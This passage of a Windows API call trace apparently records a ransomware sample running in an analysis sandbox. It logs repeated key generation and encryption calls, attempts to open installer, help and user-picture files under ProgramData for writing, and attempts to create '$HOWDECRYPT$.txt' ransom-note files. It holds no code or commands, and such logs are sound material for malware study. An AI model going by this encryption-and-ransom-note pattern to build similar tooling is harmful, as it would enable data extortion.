cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.394] GetProcessHeap () returned 0x2c0000 [0160.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4a0d0 | out: hHeap=0x2c0000) returned 1 [0160.394] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.394] GetProcessHeap () returned 0x2c0000 [0160.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3a768 | out: hHeap=0x2c0000) returned 1 [0160.394] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea88 | out: pbBuffer=0x25cea88) returned 1 [0160.394] GetProcessHeap () returned 0x2c0000 [0160.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.394] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea80*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea80*=0x30) returned 1 [0160.394] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.394] GetProcessHeap () returned 0x2c0000 [0160.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.395] GetProcessHeap () returned 0x2c0000 [0160.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c20 | out: hHeap=0x2c0000) returned 1 [0160.395] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea88 | out: pbBuffer=0x25cea88) returned 1 [0160.395] GetProcessHeap () returned 0x2c0000 [0160.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.395] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea80*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea80*=0x30) returned 1 [0160.395] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.395] GetProcessHeap () returned 0x2c0000 [0160.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.395] GetProcessHeap () returned 0x2c0000 [0160.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3c110 | out: hHeap=0x2c0000) returned 1 [0160.395] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea80 | out: pbBuffer=0x25cea80) returned 1 [0160.395] GetProcessHeap () returned 0x2c0000 [0160.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.395] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea78*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea78*=0x30) returned 1 [0160.395] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.395] GetProcessHeap () returned 0x2c0000 [0160.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.396] GetProcessHeap () returned 0x2c0000 [0160.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c8b8 | out: hHeap=0x2c0000) returned 1 [0160.396] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea80 | out: pbBuffer=0x25cea80) returned 1 [0160.396] GetProcessHeap () returned 0x2c0000 [0160.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.396] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea78*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea78*=0x30) returned 1 [0160.396] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.396] GetProcessHeap () returned 0x2c0000 [0160.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.396] GetProcessHeap () returned 0x2c0000 [0160.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84e48 | out: hHeap=0x2c0000) returned 1 [0160.396] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea78 | out: pbBuffer=0x25cea78) returned 1 [0160.396] GetProcessHeap () returned 0x2c0000 [0160.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.396] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea70*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea70*=0x30) returned 1 [0160.396] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.396] GetProcessHeap () returned 0x2c0000 [0160.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.397] GetProcessHeap () returned 0x2c0000 [0160.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c7f8 | out: hHeap=0x2c0000) returned 1 [0160.397] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea78 | out: pbBuffer=0x25cea78) returned 1 [0160.397] GetProcessHeap () returned 0x2c0000 [0160.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.397] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea70*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea70*=0x30) returned 1 [0160.397] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.397] GetProcessHeap () returned 0x2c0000 [0160.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.397] GetProcessHeap () returned 0x2c0000 [0160.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2058 | out: hHeap=0x2c0000) returned 1 [0160.397] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea70 | out: pbBuffer=0x25cea70) returned 1 [0160.397] GetProcessHeap () returned 0x2c0000 [0160.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.397] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea68*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea68*=0x30) returned 1 [0160.397] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.397] GetProcessHeap () returned 0x2c0000 [0160.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.397] GetProcessHeap () returned 0x2c0000 [0160.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1fa0 | out: hHeap=0x2c0000) returned 1 [0160.398] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea70 | out: pbBuffer=0x25cea70) returned 1 [0160.398] GetProcessHeap () returned 0x2c0000 [0160.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.398] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea68*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea68*=0x30) returned 1 [0160.398] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.398] GetProcessHeap () returned 0x2c0000 [0160.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.398] GetProcessHeap () returned 0x2c0000 [0160.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c738 | out: hHeap=0x2c0000) returned 1 [0160.398] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea68 | out: pbBuffer=0x25cea68) returned 1 [0160.398] GetProcessHeap () returned 0x2c0000 [0160.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.398] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea60*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea60*=0x30) returned 1 [0160.398] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.398] GetProcessHeap () returned 0x2c0000 [0160.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.398] GetProcessHeap () returned 0x2c0000 [0160.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1b50 | out: hHeap=0x2c0000) returned 1 [0160.399] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea68 | out: pbBuffer=0x25cea68) returned 1 [0160.399] GetProcessHeap () returned 0x2c0000 [0160.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.399] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea60*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea60*=0x30) returned 1 [0160.399] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.399] GetProcessHeap () returned 0x2c0000 [0160.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.399] GetProcessHeap () returned 0x2c0000 [0160.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0a868 | out: hHeap=0x2c0000) returned 1 [0160.399] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea60 | out: pbBuffer=0x25cea60) returned 1 [0160.399] GetProcessHeap () returned 0x2c0000 [0160.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.399] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea58*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea58*=0x30) returned 1 [0160.399] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.399] GetProcessHeap () returned 0x2c0000 [0160.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.399] GetProcessHeap () returned 0x2c0000 [0160.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8cb08 | out: hHeap=0x2c0000) returned 1 [0160.400] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea60 | out: pbBuffer=0x25cea60) returned 1 [0160.400] GetProcessHeap () returned 0x2c0000 [0160.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.400] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea58*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea58*=0x30) returned 1 [0160.400] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.400] GetProcessHeap () returned 0x2c0000 [0160.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.400] GetProcessHeap () returned 0x2c0000 [0160.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8ca18 | out: hHeap=0x2c0000) returned 1 [0160.400] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea58 | out: pbBuffer=0x25cea58) returned 1 [0160.400] GetProcessHeap () returned 0x2c0000 [0160.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.400] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea50*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea50*=0x30) returned 1 [0160.400] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.400] GetProcessHeap () returned 0x2c0000 [0160.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.400] GetProcessHeap () returned 0x2c0000 [0160.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8c928 | out: hHeap=0x2c0000) returned 1 [0160.401] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea58 | out: pbBuffer=0x25cea58) returned 1 [0160.401] GetProcessHeap () returned 0x2c0000 [0160.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.401] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea50*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea50*=0x30) returned 1 [0160.401] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.401] GetProcessHeap () returned 0x2c0000 [0160.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.401] GetProcessHeap () returned 0x2c0000 [0160.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8c838 | out: hHeap=0x2c0000) returned 1 [0160.401] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea50 | out: pbBuffer=0x25cea50) returned 1 [0160.401] GetProcessHeap () returned 0x2c0000 [0160.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.401] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea48*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea48*=0x30) returned 1 [0160.401] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.401] GetProcessHeap () returned 0x2c0000 [0160.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.401] GetProcessHeap () returned 0x2c0000 [0160.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8c748 | out: hHeap=0x2c0000) returned 1 [0160.402] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea50 | out: pbBuffer=0x25cea50) returned 1 [0160.402] GetProcessHeap () returned 0x2c0000 [0160.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.402] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea48*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea48*=0x30) returned 1 [0160.402] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.402] GetProcessHeap () returned 0x2c0000 [0160.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.402] GetProcessHeap () returned 0x2c0000 [0160.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8c658 | out: hHeap=0x2c0000) returned 1 [0160.402] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea48 | out: pbBuffer=0x25cea48) returned 1 [0160.402] GetProcessHeap () returned 0x2c0000 [0160.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.402] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea40*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea40*=0x30) returned 1 [0160.402] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.402] GetProcessHeap () returned 0x2c0000 [0160.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.402] GetProcessHeap () returned 0x2c0000 [0160.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8c568 | out: hHeap=0x2c0000) returned 1 [0160.403] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea48 | out: pbBuffer=0x25cea48) returned 1 [0160.403] GetProcessHeap () returned 0x2c0000 [0160.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.403] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea40*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea40*=0x30) returned 1 [0160.403] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.403] GetProcessHeap () returned 0x2c0000 [0160.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.403] GetProcessHeap () returned 0x2c0000 [0160.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8c478 | out: hHeap=0x2c0000) returned 1 [0160.403] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea40 | out: pbBuffer=0x25cea40) returned 1 [0160.403] GetProcessHeap () returned 0x2c0000 [0160.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.403] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea38*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea38*=0x30) returned 1 [0160.403] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.403] GetProcessHeap () returned 0x2c0000 [0160.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.403] GetProcessHeap () returned 0x2c0000 [0160.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8c388 | out: hHeap=0x2c0000) returned 1 [0160.404] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea40 | out: pbBuffer=0x25cea40) returned 1 [0160.404] GetProcessHeap () returned 0x2c0000 [0160.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.404] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea38*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea38*=0x30) returned 1 [0160.404] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.404] GetProcessHeap () returned 0x2c0000 [0160.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.404] GetProcessHeap () returned 0x2c0000 [0160.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8c298 | out: hHeap=0x2c0000) returned 1 [0160.404] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea38 | out: pbBuffer=0x25cea38) returned 1 [0160.404] GetProcessHeap () returned 0x2c0000 [0160.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.404] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea30*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea30*=0x30) returned 1 [0160.404] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.404] GetProcessHeap () returned 0x2c0000 [0160.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.404] GetProcessHeap () returned 0x2c0000 